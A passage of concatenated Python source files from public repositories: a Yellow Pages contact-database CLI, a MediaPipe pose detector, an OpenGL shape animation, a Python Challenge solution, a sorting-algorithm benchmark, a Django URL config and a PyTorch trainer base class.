Menu']\n userInput = pyip.inputMenu(prompt='Select Delete Menu:\\n', choices=choices1, numbered=True)\n if userInput == 'Delete data in Yellow Pages database':\n # ensure user how many ID that user want to delete\n userInput1 = pyip.inputChoice(prompt='How many ID that you want to delete ?\\nPlease select one of: one or more than one ? ', \n choices=['one', 'more than one'])\n \n # if user want to delete only one ID\n if userInput1 == 'one':\n userInput2 = pyip.inputInt(prompt='Enter ID that you want to delete in database:')\n if userInput2 in choices:\n # display data that you want to delete in tabular format\n print(tabulate.tabulate(list([database[str(userInput2)]]), headers=database['columns'], tablefmt=\"github\"))\n # Ensure user whether to delete or not ?\n deletingMenuInput = pyip.inputYesNo(prompt='Are you sure want to delete the data ? (Yes/No):')\n # if 'Yes' delete data from database\n if deletingMenuInput == 'yes':\n del database[str(userInput2)]\n # show database after data is deleted\n print(tabulate.tabulate(list(database.values())[1:], headers=database['columns'], tablefmt=\"github\"))\n \n # run writeCsv function\n writeCsv(database, pathCsv)\n\n # notification that data 'Data successfully deleted!'\n print('\\nData successfully deleted!')\n\n # datetime object containing current date and time\n now = datetime.now()\n # dd/mm/YY H:M:S\n dt_string = now.strftime(\"%d/%m/%Y %H:%M:%S\")\n\n # write record.txt\n file = open(pathRecord, 'a')\n file.write(f'(DELETE) User has deleted data with ID number {userInput2} at {dt_string}\\n')\n file.close()\n \n else:\n print('Okey double check your input!\\n')\n else:\n print(\"ID doesn't exist!\")\n\n # if user want to delete more than one ID\n else:\n\n # list of data\n data = list(database.values())[1:]\n\n # available ID\n choices2 = [data[index][0] for index in range(len(data))]\n\n # ensure the user what is the exact amount of ID that user want to delete\n userInput3 = pyip.inputInt(prompt='Specify the exact amount of ID that you want to delete ?\\n', greaterThan=1, lessThan=len(data))\n # store IDs that user want to delete in a variable\n userInput4 = []\n for i in range(userInput3):\n userInput5 = pyip.inputMenu(prompt=f'Enter ID ke-{i+1} that you want to delete: \\nThese are the available ID:\\n', \n choices=valueInttoStr(choices2), lettered=True)\n # in order to showing the data that user want to delete\n userInput4.append(userInput5)\n # Delete the ID from the list of available ID because of ID has been selected, so that the user does not duplicate input \n choices2.remove(int(userInput5))\n\n # display IDs that user want to delete\n displayDeleteData = [database[i] for i in userInput4]\n print(tabulate.tabulate(displayDeleteData, headers=database['columns'], tablefmt=\"github\"))\n\n # Ensure user whether to delete or not ?\n deletingMenuInput = pyip.inputYesNo(prompt='Are you sure want to delete the data ? (Yes/No):\\n')\n # if 'Yes' delete data from database\n if deletingMenuInput == 'yes':\n # delete multiple ID\n for i in userInput4:\n del database[str(i)]\n # show database after data is deleted\n print(tabulate.tabulate(list(database.values())[1:], headers=database['columns'], tablefmt=\"github\"))\n\n # notification that data 'Data successfully deleted!'\n print('\\nData successfully deleted!')\n\n # datetime object containing current date and time\n now = datetime.now()\n # dd/mm/YY H:M:S\n dt_string = now.strftime(\"%d/%m/%Y %H:%M:%S\")\n\n # write record.txt\n file = open(pathRecord, 'a')\n file.write(f\"(DELETE) User has deleted data with ID number {','.join(userInput4)} at {dt_string}\\n\")\n file.close()\n \n else:\n print('Okey double check your input!\\n')\n # Back to main menu\n else:\n break\n # keep database up to date\n return database\n\n\n# update data\ndef updateMenu(database, pathRecord):\n \"\"\"Functio to update certain column and ID of your data in database\n\n Args:\n database (dict): databases yang akan diolah\n pathRecord: variable that stored your path of record file\n \n Returns:\n database: latest database\n \"\"\"\n # list of data\n data = list(database.values())[1:]\n\n # available ID\n choices = [data[index][0] for index in range(len(data))]\n\n # select update menu\n while True:\n choices1 = ['Edit data in Yellow Pages database', 'Back to Main Menu']\n userInput = pyip.inputMenu(prompt='Select Update Menu:\\n', choices=choices1, numbered=True)\n if userInput == 'Edit data in Yellow Pages database':\n userInputIndex = pyip.inputInt(prompt='Which ID do you want to update ?\\n')\n # if userInputIdex does exist in database\n if userInputIndex in choices:\n # show row that user want to update\n print(tabulate.tabulate(list([database[str(userInputIndex)]]), headers=database['columns'], tablefmt=\"github\"))\n updateMenuInput = pyip.inputYesNo(prompt='\\nDo you want to continue to update the data ? (Yes/No):') \n if updateMenuInput == 'yes':\n # print columns options\n userInputColumn = pyip.inputMenu(prompt='Which column do you want to update ?\\n', choices=database['columns'][1:], numbered=True) # output string\n # if the user selects a column that contains integer data type (phoneNumber)\n if type(database[str(userInputIndex)][database['columns'].index(userInputColumn)]) == int:\n # number of digits of phone number must be less than or equal to 11 digits\n while True:\n database[str(userInputIndex)][database['columns'].index(userInputColumn)] = pyip.inputInt(prompt='Enter new value:')\n if len(str(database[str(userInputIndex)][database['columns'].index(userInputColumn)])) <= 11:\n break\n else:\n print(\"number of digits of the phone number must be less than or equal to 11 digits\") \n # if user choose 'Email' column\n elif userInputColumn == 'Email':\n database[str(userInputIndex)][database['columns'].index(userInputColumn)] = pyip.inputEmail(prompt='Enter new valu: ')\n # if the user selects a column that contains string data type\n else:\n database[str(userInputIndex)][database['columns'].index(userInputColumn)] = pyip.inputStr(prompt='Enter new value:', applyFunc=lambda x: x.title(), blockRegexes='1234567890@')\n # show updated row\n print(tabulate.tabulate(list([database[str(userInputIndex)]]), headers=database['columns'], tablefmt=\"github\"))\n # Update data or not ?\n updateMenuInput1 = pyip.inputYesNo(prompt='\\nAre you sure want to update the data ? (Yes/No):') \n if updateMenuInput1 == 'yes':\n # show updated database\n print(tabulate.tabulate(list(database.values())[1:], headers=database['columns'], tablefmt=\"github\"))\n \n # notification that data 'Data successfully updated!'\n print('\\nData successfully updated!\\n')\n\n # datetime object containing current date and time\n now = datetime.now()\n # dd/mm/YY H:M:S\n dt_string = now.strftime(\"%d/%m/%Y %H:%M:%S\")\n\n # write record.txt\n file = open(pathRecord, 'a')\n file.write(f\"(UPDATE) User has updated data with ID number {userInputIndex} in the {userInputColumn} column, then change the value into {database[str(userInputIndex)][database['columns'].index(userInputColumn)]} at {dt_string}\\n\")\n file.close()\n \n else:\n print('Okey double check again your input data!\\n') \n # user does not continue to update data\n else:\n print('\\nOkey double check your input data!')\n # if ID doesnt exist \n else:\n print(\"The data you're looking for doesn't exist\\n\")\n # Back to main Menu\n else:\n break\n\n # keep database up to date\n return database","repo_name":"fnkhairudin/YellowPages","sub_path":"YellowPages.py","file_name":"YellowPages.py","file_ext":"py","file_size_in_byte":23764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"37027678433","text":"import mediapipe as mp\r\nimport math\r\nimport cv2\r\n\r\nclass poseDetector():\r\n def __init__(self,\r\n staticMode=False,\r\n model_complexity=False,\r\n smooth=True,\r\n minDetectionCon=0.5,\r\n minTrackCon=0.5):\r\n\r\n self.staticMode = staticMode\r\n self.modelComplexity = model_complexity\r\n self.smooth = smooth\r\n self.minDetectionCon = minDetectionCon\r\n self.minTrackCon = minTrackCon\r\n\r\n self.mpDraw = mp.solutions.drawing_utils\r\n self.mpPose = mp.solutions.pose\r\n self.pose = self.mpPose.Pose(static_image_mode=self.staticMode, model_complexity=self.modelComplexity,\r\n smooth_landmarks=self.smooth,\r\n min_detection_confidence=self.minDetectionCon,\r\n min_tracking_confidence=self.minTrackCon)\r\n self.drawLandmarkSpec = self.mpDraw.DrawingSpec(\r\n thickness=2, circle_radius=2, color=(255,0,0))\r\n self.drawConnectionSpec = self.mpDraw.DrawingSpec(\r\n thickness=2, color=(34,247,10))\r\n\r\n\r\n def find_Person(self, frame, draw=True):\r\n self.imgRGB = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\r\n self.results = self.pose.process(self.imgRGB)\r\n if self.results.pose_landmarks and draw:\r\n self.mpDraw.draw_landmarks(frame, self.results.pose_landmarks,\r\n self.mpPose.POSE_CONNECTIONS, self.drawLandmarkSpec, self.drawConnectionSpec)\r\n return frame\r\n\r\n def find_landmarks(self, frame, draw=True):\r\n self.landmark_list=[]\r\n if self.results.pose_landmarks:\r\n for id, lm in enumerate(self.results.pose_landmarks.landmark):\r\n h,w,c = frame.shape\r\n cx, cy = int(lm.x * w), int(lm.y * h)\r\n self.landmark_list.append([id, cx, cy])\r\n if draw:\r\n cv2.circle(frame, (cx, cy), 5, (255, 0, 0), cv2.FILLED)\r\n return self.landmark_list\r\n\r\n def find_angle(self, frame, p1, p2, p3, draw=True):\r\n # Get the landmarks\r\n x1, y1 = self.landmark_list[p1][1:]\r\n x2, y2 = self.landmark_list[p2][1:]\r\n x3, y3 = self.landmark_list[p3][1:]\r\n # Calculate the Angle\r\n angle = math.degrees(math.atan2(y3 - y2, x3 - x2) -\r\n math.atan2(y1 - y2, x1 - x2))\r\n if angle < 0:\r\n angle += 360\r\n print(\"ANGLE\")\r\n print(angle)\r\n\r\n # Draw\r\n if draw:\r\n cv2.line(frame, (x1, y1), (x2, y2), (255, 255, 255), 5)\r\n cv2.line(frame, (x3, y3), (x2, y2), (255, 255, 255), 5)\r\n cv2.circle(frame, (x1, y1), 11, (0, 0, 255), cv2.FILLED)\r\n cv2.circle(frame, (x1, y1), 16, (255, 60, 0), 2)\r\n cv2.circle(frame, (x2, y2), 10, (0, 0, 255), cv2.FILLED)\r\n cv2.circle(frame, (x2, y2), 16, (255, 60, 0), 2)\r\n cv2.circle(frame, (x3, y3), 11, (0, 0, 255), cv2.FILLED)\r\n cv2.circle(frame, (x3, y3), 16, (255, 60, 0), 2)\r\n\r\n cv2.putText(frame, str(int(angle)), (x3 - 50, y3 + 60),\r\n cv2.FONT_HERSHEY_DUPLEX, 1, (255, 255, 255), 1)\r\n return angle\r\n\r\ndef main():\r\n cap = cv2.VideoCapture('TrainerData/curls.mp4')\r\n detector = poseDetector()\r\n while True:\r\n success, frame = cap.read()\r\n #frame = cv2.imread(\"TrainerData/bicep_curls.jpeg\")\r\n frame = detector.find_Person(frame)\r\n landmark_list = detector.find_landmarks(frame, draw=True)\r\n print(landmark_list)\r\n if len(landmark_list) != 0:\r\n print(landmark_list[16])\r\n cv2.circle(\r\n frame, (landmark_list[16][1], landmark_list[16][2]), 15, (0, 0, 255), cv2.FILLED)\r\n\r\n cv2.imshow(\"Image\", frame)\r\n key = cv2.waitKey(1)\r\n if key == ord('q'):\r\n break\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"alazimariff/pythonAiTrainer","sub_path":"PoseModule.py","file_name":"PoseModule.py","file_ext":"py","file_size_in_byte":3987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27272030292","text":"from OpenGL.GL import *\nfrom curs.constants import *\nfrom PIL import Image\nimport numpy\n\nW = 0.2\nN = 6\n\nV = [[-W, +W, +W], # 0\n [-W, +W, -W], # 1\n [+W, +W, -W], # 2\n [+W, +W, +W], # 3\n [0, 0, 0], # 4\n [-W, -W, +W], # 5\n [-W, -W, -W], # 6\n [+W, -W, -W], # 7\n [+W, -W, +W]] # 8\n\nT_PLANES = [\n (V[0], V[1], V[4]),\n (V[1], V[6], V[4]),\n (V[6], V[5], V[4]),\n (V[5], V[0], V[4]),\n #\n (V[3], V[2], V[4]),\n (V[2], V[7], V[4]),\n (V[7], V[8], V[4]),\n (V[8], V[3], V[4]),\n #\n #\n (V[0], V[1], V[4]),\n (V[1], V[2], V[4]),\n (V[2], V[3], V[4]),\n (V[3], V[0], V[4]),\n #\n (V[7], V[8], V[4]),\n (V[6], V[7], V[4]),\n (V[5], V[6], V[4]),\n (V[8], V[5], V[4])\n]\n\nQ_PLANES = [\n (V[0], V[3], V[8], V[5]), # 1\n (V[0], V[1], V[6], V[5]), # 2\n (V[1], V[2], V[7], V[6]), # 3\n (V[2], V[3], V[8], V[7]), # 4\n]\n\n\nclass NotConvex:\n\n def __init__(self):\n self.t = 0.0\n self.is_rotated = False\n self.rotation_times = 0\n self.change_direction_times = 0\n self.unit = 1\n self.update(self.unit)\n self.rotation_limit = N\n\n def draw(self):\n glMaterialfv(GL_FRONT_AND_BACK, GL_DIFFUSE, WHITE)\n if not self.is_rotated:\n if self.rotation_times == N or self.rotation_times == N * 2:\n self.change_direction()\n self.rotate(self.unit)\n else:\n self.update(self.unit)\n # glPolygonMode(GL_FRONT_AND_BACK, GL_LINE)\n glBegin(GL_TRIANGLES)\n for plane in T_PLANES:\n for vertex in plane:\n D = numpy.sqrt(pow(vertex[0], 2) + pow(vertex[1], 2) + pow(vertex[2], 2))\n normale_x = vertex[0] - V[4][0]\n normale_y = vertex[1] - V[4][1]\n normale_z = vertex[2] - V[4][2]\n glNormal3f(normale_x, normale_y, normale_z)\n glVertex3f(vertex[0], vertex[1], vertex[2])\n glEnd()\n\n # glBegin(GL_QUADS)\n # for plane in Q_PLANES:\n # for vertex in plane:\n # print(vertex)\n # glNormal3f(vertex[0], vertex[1], vertex[2])\n # glVertex3f(vertex[0], vertex[1], vertex[2])\n # glEnd()\n glMaterialfv(GL_FRONT_AND_BACK, GL_DIFFUSE, (0, 0, 0, 0))\n\n def position(self, t=0):\n self.t = t\n\n def change_direction(self):\n self.change_direction_times += 1\n self.rotation_times = 1\n self.is_rotated = False\n self.unit += 1\n\n def rotate(self, unit):\n if unit == 1:\n self.rotateXY()\n if unit == 2:\n self.rotateYZ()\n if unit == 3:\n self.rotateXY2()\n\n def rotateXY(self, direction=1):\n x0 = V[5][0]\n y0 = V[5][1]\n for i in range(len(V)):\n if (i == 5 or i == 6):\n continue\n vertex = V[i]\n x = vertex[0]\n y = vertex[1]\n R = numpy.sqrt(pow(x - x0, 2) + pow(y - y0, 2))\n angle = numpy.arccos((x - x0) / R)\n new_angle = angle + self.t\n # if i == 0 and angle >= numpy.pi / 2:\n # self.t += 0.005 * (self.unit * self.rotation_limit + self.rotation_times)\n if new_angle >= numpy.pi:\n self.is_rotated = True\n break\n new_x = x0 + direction * R * numpy.cos(new_angle)\n new_y = y0 + R * numpy.sin(new_angle)\n vertex[0] = new_x\n vertex[1] = new_y\n\n def rotateXY2(self):\n x0 = V[8][0]\n y0 = V[8][1]\n for i in range(len(V)):\n if (i == 8 or i == 7):\n continue\n vertex = V[i]\n x = vertex[0]\n y = vertex[1]\n R = numpy.sqrt(pow(x - x0, 2) + pow(y - y0, 2))\n angle = numpy.arccos((x - x0) / R)\n if i == 0 and angle <= 2 * numpy.pi / 3:\n self.t += 0.05\n new_angle = angle - self.t\n if new_angle <= 0:\n self.is_rotated = True\n break\n new_x = x0 + R * numpy.cos(new_angle)\n new_y = y0 + R * numpy.sin(new_angle)\n vertex[0] = new_x\n vertex[1] = new_y\n\n def rotateYZ(self):\n y0 = V[8][1]\n z0 = V[8][2]\n for i in range(len(V)):\n if (i == 5 or i == 8):\n continue\n vertex = V[i]\n y = vertex[1]\n z = vertex[2]\n R = numpy.sqrt(pow(y - y0, 2) + pow(z - z0, 2))\n angle = numpy.arccos((z0 - z) / R)\n if i == 0 and angle >= numpy.pi / 3:\n self.t += 0.01\n new_angle = angle + self.t\n if new_angle >= numpy.pi:\n self.is_rotated = True\n break\n new_y = y0 + R * numpy.sin(new_angle)\n new_z = z0 - R * numpy.cos(new_angle)\n vertex[1] = new_y\n vertex[2] = new_z\n\n def update(self, unit):\n global V\n global T_PLANES\n V = [[-W, +W, +W], # 0\n [-W, +W, -W], # 1\n [+W, +W, -W], # 2\n [+W, +W, +W], # 3\n [0, 0, 0], # 4\n [-W, -W, +W], # 5\n [-W, -W, -W], # 6\n [+W, -W, -W], # 7\n [+W, -W, +W]] # 8\n for v in V:\n if unit == 1:\n v[0] -= W * 2 * self.rotation_times\n if unit == 2:\n v[0] -= W * 2 * (N - 1)\n v[2] += W * 2 * self.rotation_times\n if unit == 3:\n v[0] -= W * 2 * (N - 1) - W * 2 * self.rotation_times\n v[2] += W * 2 * (N - 1)\n\n T_PLANES = [\n (V[0], V[1], V[4]),\n (V[1], V[6], V[4]),\n (V[6], V[5], V[4]),\n (V[5], V[0], V[4]),\n #\n (V[3], V[2], V[4]),\n (V[2], V[7], V[4]),\n (V[7], V[8], V[4]),\n (V[8], V[3], V[4]),\n #\n #\n (V[0], V[1], V[4]),\n (V[1], V[2], V[4]),\n (V[2], V[3], V[4]),\n (V[3], V[0], V[4]),\n #\n (V[7], V[8], V[4]),\n (V[6], V[7], V[4]),\n (V[5], V[6], V[4]),\n (V[8], V[5], V[4])\n ]\n self.is_rotated = False\n self.rotation_times += 1\n","repo_name":"veronikaKochugova/OpenGL","sub_path":"curs/NotConvex.py","file_name":"NotConvex.py","file_ext":"py","file_size_in_byte":6325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"22242061338","text":"\nimport cv2\nfrom visualize import visualize, show_image\nfrom load_dataset import load_image\nfrom keras.models import load_model\nimport matplotlib.pyplot as plt\n\n# Load autoencoder model\nautoencoder_faces = load_model('models/faces/faces.h5')\nautoencoder_cocoon = load_model('models/cocoon/cocoon.h5')\nprint(autoencoder_faces.summary())\nprint(autoencoder_cocoon.summary())\n\n# Testing\ntst_img = load_image(\"test_images/selfie.webp\")\ntst_img = tst_img.astype('float32')/255.0 - 0.5\ntst_img_32 = cv2.resize(tst_img, (32, 32))\ntst_img_32 = cv2.resize(tst_img, (32, 32))\nout1 = autoencoder_faces.predict(tst_img_32[None])[0]\nout2 = autoencoder_cocoon.predict(tst_img_32[None])[0]\n#visualize(tst_img,encoder,decoder)\n\nplt.subplot(2,2,1)\nplt.title(\"Original\")\nshow_image(tst_img_32)\n\nplt.subplot(2,2,2)\nplt.title(\"Reconstructed\")\nshow_image(out1)\n\nplt.subplot(2,2,3)\n#plt.title(\"Original\")\nshow_image(tst_img_32)\n\nplt.subplot(2,2,4)\n#plt.title(\"Reconstructed\")\nshow_image(out2)\nplt.show()","repo_name":"dvillacis/objeto_selfie","sub_path":"test_autoencoder.py","file_name":"test_autoencoder.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"34205031945","text":"\"\"\"\nhttp://huge:file@www.pythonchallenge.com/pc/return/evil.html\n\"\"\"\nfrom io import BytesIO\n\nimport requests\nfrom PIL import Image\n\nDATA = \"http://huge:file@www.pythonchallenge.com/pc/return/evil2.gfx\"\n\n\ndef solve():\n data = requests.get(DATA).content\n\n for offset in range(5):\n img_data = bytes(b for b in data[offset::5])\n Image.open(BytesIO(img_data)).show()\n\n\nif __name__ == \"__main__\":\n solve()\n","repo_name":"arjandepooter/python-challenge","sub_path":"12.py","file_name":"12.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3985111855","text":"import os\nimport random\nimport time\nimport matplotlib.pyplot as plt\nimport subprocess\nimport sys\n\ndata_sizes = [10000, 50000, 100000, 200000, 300000, 400000,\n 500000, 600000, 700000, 800000, 900000, 1000000]\nsort_times = {'heap_sort': [], 'merge_sort': [],\n 'quick_sort': [], 'shell_sort': []}\n\n\ndef compile_exe(sort_name: str) -> None:\n path = './src/{}.cpp'.format(sort_name)\n os.system('g++ -o ./exe/{} {}'.format(sort_name, path))\n\n\ndef call_exe(sort_name: str, random_data: list[int]) -> float:\n path = './exe/{}.exe'.format(sort_name)\n\n start_time = time.time()\n out = subprocess.Popen(path, stdin=subprocess.PIPE, stdout=subprocess.PIPE)\n out = out.communicate(input=' '.join(\n [str(i) for i in random_data]).encode('utf-8'))[0]\n end_time = time.time()\n\n out = out.decode('utf-8').split()\n out = [int(i) for i in out]\n if not check_sorted(out):\n print('Error: {} is not sorted!'.format(sort_name))\n sys.exit(1)\n\n return end_time - start_time\n\n\ndef check_sorted(data: list) -> bool:\n for i in range(len(data) - 1):\n if data[i] > data[i + 1]:\n return False\n return True\n\n\ndef generate_random_data(data_size: int) -> list[int]:\n data = [i for i in range(data_size)]\n random.shuffle(data)\n return data\n\n\ndef paint_data() -> None:\n for sort_name in sort_times.keys():\n plt.plot(data_sizes, sort_times[sort_name], label=sort_name)\n plt.xlabel('data size')\n plt.ylabel('running time')\n plt.title('running time of different sorting algorithms')\n plt.legend()\n plt.savefig('running_time.png')\n\ndef main() -> None:\n for sort_name in sort_times.keys():\n compile_exe(sort_name)\n\n for data_size in data_sizes:\n print('data size: {}'.format(data_size))\n random_data = generate_random_data(data_size)\n for sort_name in sort_times.keys():\n sort_times[sort_name].append(call_exe(sort_name, random_data))\n print('{} running time: {:.3f}'.format(sort_name, sort_times[sort_name][-1])) \n\n paint_data()\n\n\nif __name__ == '__main__': \n main()\n","repo_name":"fatbrother/Sorting-Graph","sub_path":"paint.py","file_name":"paint.py","file_ext":"py","file_size_in_byte":2108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71526725852","text":"from django.urls import path\n\nfrom .views import getLiked, insertLiked, deleteLiked, getLikedMoive\n\nurlpatterns = [\n path('getLiked/', getLiked, name='getLiked'),\n path('insertLiked/', insertLiked, name='insertLiked'),\n path('deleteLiked/', deleteLiked, name='deleteLiked'),\n path('getLikedMoive/', getLikedMoive, name='getLikedMoive')\n]\n","repo_name":"BaeJihyun97/Movie_Recommendation","sub_path":"backend/djangoreactapi/service/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"69894445851","text":"import torch\nimport os\n\nfrom abc import abstractmethod\nfrom numpy import inf\nfrom utils.io import prepare_device\nfrom logger import TensorboardWriter\n\nimport models.hppw as module_arch\nimport models.hppw as module_metric\nimport models.hppw as module_loss\nfrom models.projection.model import LinearProjection\nfrom utils.io import MetricTracker\n\nimport wandb\n\n\n\nclass BaseTrainer:\n \"\"\"\n Base class for all trainers\n \"\"\"\n def __init__(self, config):\n\n self.config = config\n self.logger = self.config.get_logger('trainer', config['trainer']['verbosity'])\n \n cfg_trainer = config['trainer']\n self.epochs = cfg_trainer['epochs']\n self.save_period = cfg_trainer['save_period']\n self.eval_period = cfg_trainer['eval_period']\n\n self.monitor = cfg_trainer.get('monitor', 'off')\n\n # configuration to monitor model performance and save best\n if self.monitor == 'off':\n self.monitor_mode = 'off'\n self.monitor_best = 0\n else:\n self.monitor_mode, self.monitor_metric = self.monitor.split()\n assert self.monitor_mode in ['min', 'max']\n\n self.monitor_best = inf if self.monitor_mode == 'min' else -inf\n\n # Only enable early stopping if given and above 0\n self.early_stop = cfg_trainer.get('early_stop', inf)\n if self.early_stop <= 0:\n self.early_stop = inf # training proceeds till the very last epoch\n\n self.monitor = cfg_trainer.get('monitor', 'off')\n\n # configuration to monitor model performance and save best\n if self.monitor == 'off':\n self.monitor_mode = 'off'\n self.monitor_best = 0\n else:\n self.monitor_mode, self.monitor_metric = self.monitor.split()\n assert self.monitor_mode in ['min', 'max']\n\n self.monitor_best = inf if self.monitor_mode == 'min' else -inf\n\n # Only enable early stopping if given and above 0\n self.early_stop = cfg_trainer.get('early_stop', inf)\n if self.early_stop <= 0:\n self.early_stop = inf # training proceeds till the very last epoch\n\n self.checkpoint_dir = config.save_dir\n\n # setup visualization writer instance\n self.writer = None\n if config['tensorboard']:\n self.writer = TensorboardWriter(config.log_dir, self.logger)\n\n\n self.start_epoch = 1\n self.best_epoch = 1\n self.best_epoch = 1\n self.current_epoch = 1\n self.best_top1 = 0\n\n # prepare for (multi-device) GPU training\n # This part doesn't do anything if you don't have a GPU.\n self._device, self._device_ids = prepare_device(config['n_gpu'])\n self.wandb_enabled = config['wandb']\n if self.wandb_enabled:\n self.wandb = wandb\n\n self.wandb.login()\n self.wandb.init(project=\"human-pose-prediction-in-the-wild\")\n \n self.model = config.init_obj('arch', module_arch)\n self.model_proj = LinearProjection(**config[\"arch3d\"])\n self.model.to(self._device)\n if len(self._device_ids) > 1:\n self.model = torch.nn.DataParallel(self.model, device_ids=self._device_ids)\n\n # Simply Log the model (enable if you want to see the model architecture)\n # self.logger.info(self.model)\n # Prepare Losses\n # self.criterion = getattr(module_loss, config['loss'])\n self.criterion = getattr(module_loss, config['loss'][\"type\"])\n # Prepare Optimizer\n trainable_params = filter(lambda p: p.requires_grad, self.model.parameters())\n self.optimizer = config.init_obj('optimizer', torch.optim, trainable_params)\n self.lr_scheduler = config.init_obj('lr_scheduler', torch.optim.lr_scheduler, self.optimizer) \n \n self.metric_ftns = [getattr(module_metric, met['type'])(**met['args']) for met in config['metrics']]\n self.epoch_metrics = MetricTracker(keys=['loss2d'] + [str(m) for m in self.metric_ftns], writer=self.writer)\n self.eval_metrics = MetricTracker(keys=['loss2d'] + [str(m) for m in self.metric_ftns], writer=self.writer)\n \n @abstractmethod\n def _train_epoch(self):\n \"\"\"\n Training logic for an epoch. Only takes care of doing a single training loop.\n\n :return: A dict that contains average loss and metric(s) information in this epoch.\n \"\"\"\n raise NotImplementedError\n\n def train(self):\n \"\"\"\n Full training logic\n \"\"\"\n\n self.not_improved_count = 0\n prev_metric_value = 999999999999999 if self.monitor_mode == \"min\" else 0 \n if self.wandb_enabled: wandb.watch(self.model, self.criterion, log='all')\n states = {\"loss2d\": {\"train\": [], \"val\": []}, \"loss3d\": {\"train\": [], \"val\": []}}\n for epoch in range(self.start_epoch, self.epochs + 1):\n \n if epoch % self.curriculum[\"duration\"] == 0:\n \n self.future_window += self.curriculum[\"step\"]\n self.history_window += self.curriculum[\"step\"]\n \n if self.history_window > self.max_history_window:\n self.history_window = self.max_history_window\n \n if self.future_window > self.max_future_window:\n self.future_window = self.max_future_window\n \n self.logger.info(f\"Setting curriculum to history window: {self.history_window}, future window: {self.future_window}\") \n\n \n self.current_epoch = epoch\n train_result = self._train_epoch()\n states[\"loss2d\"][\"train\"].append(train_result[\"loss2d\"])\n if self.use_projection:\n states[\"loss3d\"][\"train\"].append(train_result[\"loss3d\"])\n # save logged informations into log dict\n log = {'epoch': self.current_epoch}\n log.update(train_result)\n\n if self._do_evaluate():\n eval_result = self.evaluate(history_window=self.history_window, future_window=self.future_window)\n states[\"loss2d\"][\"val\"].append(eval_result[\"loss2d\"])\n if self.use_projection:\n states[\"loss3d\"][\"val\"].append(eval_result[\"loss3d\"])\n # save eval information to the log dict as well\n log.update({f'eval_{key}': value for key, value in eval_result.items()})\n if self.wandb_enabled:\n self.wandb.log(log)\n\n\n\n if self.monitor_mode != 'off' : # Then there is a metric to monitor\n if self.monitor_metric in log: # Then we have measured it in this epoch\n\n \n metric_value = log[self.monitor_metric]\n if self.monitor_mode == \"min\" and metric_value < prev_metric_value:\n self.not_improved_count = 0\n path = os.path.join(self.checkpoint_dir, f'best_model.pth')\n self.save_model(path=path)\n self.logger.info(f\"Saving model with best metric at {path}\") \n prev_metric_value = metric_value\n\n elif self.monitor_mode == \"max\" and metric_value > prev_metric_value:\n self.not_improved_count = 0\n path = os.path.join(self.checkpoint_dir, f'best_model.pth')\n self.save_model(path=path) \n self.logger.info(f\"Saving model with best metric at {path}\") \n prev_metric_value = metric_value\n \n else:\n if self.early_stop:\n self.not_improved_count += 1\n if self.not_improved_count == self.early_stop:\n self.logger.info(f\"No improvement so far... breaking...goodby\")\n break\n self.logger.info(f\"Patience running out... {self.not_improved_count}\") \n\n\n else:\n ## The metric wasn't measured in this epoch. Don't change not_impoved_count or similar things here!!!\n self.logger.warning(f\"Warning: At epoch {self.current_epoch} Metric '{self.monitor_metric}' wasn't measured. Not monitoring it for this epoch.\")\n \n # print logged information to the screen\n for key, value in log.items():\n self.logger.info(' {:15s}: {}'.format(str(key), value))\n\n if self.wandb_enabled: wandb.log(log)\n\n if self.current_epoch % self.save_period == 0:\n # Just to regularly save the model every save_period epochs\n path = os.path.join(self.checkpoint_dir, f'per_epoch_model.pth')\n self.save_model(path=path)\n self.lr_scheduler.step(eval_result[\"loss2d\"])\n # Always save the last model\n path = os.path.join(self.checkpoint_dir, f'last_model.pth')\n self.save_model(path=path)\n return states\n\n def _do_evaluate(self):\n \"\"\"\n Based on the self.current_epoch and self.eval_interval, determine if we should evaluate.\n You can take hint from saving logic implemented in BaseTrainer.train() method\n\n returns a Boolean\n \"\"\"\n if self.current_epoch % self.eval_period == 0:\n return True\n else:\n return False\n \n @abstractmethod\n def evaluate(self, loader=None):\n \"\"\"\n Evaluate the model on the val_loader given at initialization\n\n :param loader: A Dataloader to be used for evaluation. If not given, it will use the \n self._eval_loader that's set during initialization..\n :return: A dict that contains metric(s) information for validation set\n \"\"\"\n raise NotImplementedError\n \n def save_model(self, path=None):\n \"\"\"\n Saves only the model parameters.\n : param path: path to save model (including filename.)\n \"\"\"\n self.logger.info(\"Saving checkpoint: {} ...\".format(path))\n torch.save(self.model.state_dict(), path)\n self.logger.info(\"Checkpoint saved.\")\n \n def load_model(self, path=None):\n self.logger.info(\"Saving checkpoint: {} ...\".format(path))\n torch.save(self.model.state_dict(), path)\n self.logger.info(\"Checkpoint saved.\")\n\n def load_model(self, path=None):\n \"\"\"\n Loads model params from the given path.\n : param path: path to save model (including filename.)\n \"\"\"\n self.logger.info(\"Loading checkpoint: {} ...\".format(path))\n self.model.load_state_dict(torch.load(path))\n self.logger.info(\"Checkpoint loaded.\")\n\n\n def save_checkpoint(self, path=None):\n \"\"\"\n Saving TRAINING checkpoint. Including the model params and other training stats\n (optimizer, current epoch, etc.)\n\n :param path: if True, rename the saved checkpoint to 'model_best.ckpt'\n :param path: if True, rename the saved checkpoint to 'model_best.ckpt'\n \"\"\"\n arch = type(self.model).__name__\n state = {\n 'arch': arch,\n 'epoch': self.current_epoch,\n 'model': self.model.state_dict(),\n 'optimizer': self.optimizer.state_dict(),\n 'lr_scheduler': self.lr_scheduler.state_dict(),\n 'monitor_best': self.monitor_best,\n 'config': self.config\n }\n torch.save(state, path)\n self.logger.info(\"Saving checkpoint: {} ...\".format(path))\n\n\n def resume_checkpoint(self, resume_path=None):\n \"\"\"\n 